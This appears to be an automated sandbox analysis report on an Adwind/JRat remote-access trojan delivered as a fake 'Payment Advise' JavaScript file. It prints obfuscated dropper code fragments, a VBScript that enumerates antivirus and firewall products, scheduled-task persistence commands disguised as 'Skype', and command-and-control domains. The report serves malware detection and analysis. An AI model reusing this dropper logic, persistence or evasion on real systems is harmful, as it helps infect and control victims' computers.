Source: javaw.exe, 00000006.00000002.7678289065.0000000002EF0000.00000004.sdmp, javaw.exe, 0000000B.00000002.8757288355.0000000003020000.00000004.sdmp | Binary or memory string: O[Ljava/lang/VirtualMachineError;
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp | Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000B.00000002.8755708675.00000000015A0000.00000004.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000000.00000002.8268162216.0000000006930000.00000002.sdmp, wscript.exe, 00000004.00000002.7674173949.0000000005820000.00000002.sdmp, wscript.exe, 00000005.00000002.8748496547.0000000005B00000.00000002.sdmp, javaw.exe, 00000006.00000002.7697698930.0000000015990000.00000002.sdmp, javaw.exe, 0000000B.00000002.8769638913.0000000015A30000.00000002.sdmp, javaw.exe, 0000000F.00000002.7797593750.0000000001070000.00000002.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\SysWOW64\wscript.exe | System information queried: KernelDebuggerInformation
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 41.217.32.205 75
Contains functionality to query the security center for anti-virus and firewall products
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: emservicesex.execquery("select * from antivirusproduct");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: end
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: owmi = getobject("wih
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: ts:{impersonationlevr
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: uritycenter2")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: set f
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: elect * from antivirj
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: oduct")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: for each obt
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: m in colitems
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: wit^
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: jitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: wscript.ex
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: "{""av"":""" & .dis"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: name & """}"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: end ,
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: bemservicesex.execquery("select * from antivirusproduct");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: :iswbemobjectset._newenum();
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: :iswbemobjectex._01800001();
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: tihost.echo("{"av":"windows defender"}");
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: "}av":"* from antivirusproductmpersonate}!\\.\root\securitycenter2
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: set@<
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: owmi@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: getobject@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: bwinmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: colitems@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: execquery@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: select * from antivirusproductb
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: each@*
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: objiteml
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: with@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: wscript@o
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: echo@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: {"av":"@g
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: displayname@
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: winmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: getobject<
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: t.<select * from antivirusproduct
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: execquery
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: colitems*
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: objitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: {"av":"g
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: displayname
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: vbscript - script blockset owmi = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\securitycenter2")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: set colitems = owmi.execquery("select * from antivirusproduct")
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: for each objitem in colitems
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: with objitem
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: wscript.echo "{""av"":""" & .displayname & """}"
Source: cscript.exe, 00000024.00000002.8303629011.0000000002D90000.00000004.sdmp | Binary or memory string: end with
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var callerreactjs = new function();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function nextedfunctionone(_) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (none_value, nuller) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (none_value_two) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (none_value_three) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (none_value_four) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function(nodejsserverscript , _crackernut) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var _dummyobject =new callerreactjs();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nodejsserverscript.type = 1; nodejsserverscript.open();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nodejsserverscript.write(_crackernut);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nodejsserverscript.position = 0;
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nodejsserverscript.type = 2;
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nodejsserverscript.charset = "us-ascii";
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return nodejsserverscript.readtext();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function v8engine(_crra, snapshopt_v1) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var puengine$ = _crra.createelement("tmp");
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: puengine$.datatype = "bin.base64";
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: puengine$.text = snapshopt_v1;
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return puengine$.nodetypedvalue;
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function nextedfunction(__) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (none_value) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function(_crrakk, _crackernut, nodejsserverscript, _nutengine) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return nextedfunctionone([])(null,null)({_:""})(null)( {} instanceof object)(nodejsserverscript, _crackernut);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function nextedfunctiontwo(_) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return function (_crra, snapshopt_v1) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: if (_crra != null && typeof [] != 'string' && typeof object != 'string') {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return v8engine(_crra, snapshopt_v1);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: }
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function workradiostation(godofwar, fdsdsd) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var compat, electric, duvet, codeengine$$;
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: if (typeof fdsdsd != null) {
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var regx = new regexp(compat, "g");
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: codeengine$$ = duvet.replace(regx, electric);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var objectbucket = "devet.endswith('.server.{columnjs}')".charcodeat(0);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: return nextedfunctiontwo([])(null,null)({_:""})(null)( {} instanceof object)(wscript.createobject("microsoft.xmldom"), codeengine$$);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: function conferencecentercall(){
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: callerreactjs.constructor.pphx = function(){
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var uui =
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: workradiostation(
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: 0, !!0, !(0&!!0&!!0&!0|new number(34), uui),
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: !!(new regexp("",'g').exec()),null);
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var objectmethods= eval(
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: nextedfunction(
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: wscript.disconnectobject(
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: wscript.createobject("adodb.stream")
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: )
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: )
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: (null)(null)(null)(null)
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: (!!0, uui,wscript.createobject("adodb.stream"), number([24 / 12].tostring()
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: ));
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: };
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: this.me_instance = callerreactjs.constructor.pphx();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var install_instance = new conferencecentercall();
Source: 35Payment Advise - 201903140987758292 copy_2.js | Binary or memory string: var ff= install_instance.me_instance ;
Source: cce3fe3b0d8d80db.timestamp.11.dr | Binary or memory string: c:\program files (x86)\java\jre1.8.0_171
Source: cce3fe3b0d8d80db.timestamp.11.dr | Binary or memory string: 1552648042024
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
May try to detect the Windows Explorer process (often used for injection)
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmp | Binary or memory string: Progman
Source: wscript.exe, 00000005.00000002.8741816039.0000000003930000.00000002.sdmp, javaw.exe, 0000000B.00000002.8756517606.0000000001A30000.00000002.sdmp | Binary or memory string: ZProgram Manager

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000005.00000002.8750970481.0000000006310000.00000004.sdmp, wscript.exe, 00000017.00000002.8908412172.000001E97BA29000.00000004.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Remote Access Functionality:

ADWIND Rat detected
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe | Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe | Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext
Java source code contains strings found in CrossRAT
Source: ufvkaboule.txt.0.dr | Suspicious string: operational.JRat (in operational/Jrat.java)
Source: rnmbjgzzvs.txt.4.dr | Suspicious string: operational.JRat (in operational/Jrat.java)

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 116875
Sample: 35Payment Advise - 201903140987758292 copy_2.js
Startdate: 15/03/2019
Architecture: WINDOWS
Score: 100

Graph nodes (node number, label, and the edge from the parent node; counts after a process name are the legend's registry-value and file counts):
  • 2: start node (the sample)
  • 96: sweetboy.duckdns.org (DNS/IP, 2->96)
  • 98: unknownsoft.hopto.org (DNS/IP, 2->98)
  • 118: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) (signature, 2->118)
  • 120: Multi AV Scanner detection for domain / URL (signature, 2->120)
  • 122: Antivirus detection for URL or domain (signature, 2->122)
  • 124: 7 other signatures (2->124)
  • 10: wscript.exe 1 3 (process, 2->10, started)
  • 13: wscript.exe (process, 2->13, started)
  • 17: wscript.exe (process, 2->17, started)
  • 19: 5 other processes (2->19)
  • 134: Drops script or batch files to the startup folder (signature, 10->134)
  • 21: javaw.exe (process, 10->21, started)
  • 24: wscript.exe 1 3 (process, 10->24, started)
  • 102: unknownsoft.hopto.org (DNS/IP, 13->102)
  • 92: C:\Users\user\AppData\...\IyFfaseYOW.js, ASCII (created file, 13->92, dropped)
  • 27: schtasks.exe (process, 13->27, started)
  • 104: unknownsoft.hopto.org (DNS/IP, 17->104)
  • 94: C:\Users\user\AppData\Roaming\IyFfaseYOW.js, ASCII (created file, 17->94, dropped)
  • 136: System process connects to network (likely due to code injection or exploit) (signature, 17->136)
  • 29: schtasks.exe (process, 17->29, started)
  • 106: unknownsoft.hopto.org (DNS/IP, 19->106)
  • 108: unknownsoft.hopto.org (DNS/IP, 19->108)
  • 110: unknownsoft.hopto.org (DNS/IP, 19->110)
  • 138: Creates multiple autostart registry keys (signature, 19->138)
  • 31: javaw.exe (process, 19->31, started)
  • 34: javaw.exe (process, 19->34, started)
  • 36: schtasks.exe (process, 19->36, started)
  • 82: C:\Users\...\Retrive7989435855425943881.vbs, ASCII (created file, 21->82, dropped)
  • 84: C:\Users\...\Retrive1973602545167020741.vbs, ASCII (created file, 21->84, dropped)
  • 38: java.exe (process, 21->38, started)
  • 42: cmd.exe (process, 21->42, started)
  • 44: cmd.exe (process, 21->44, started)
  • 86: C:\Users\user\AppData\...\rnmbjgzzvs.txt, Zip (created file, 24->86, dropped)
  • 130: Creates autostart registry keys to launch java (signature, 24->130)
  • 132: Creates multiple autostart registry keys (signature, 24->132)
  • 46: wscript.exe 2 13 (process, 24->46, started)
  • 49: javaw.exe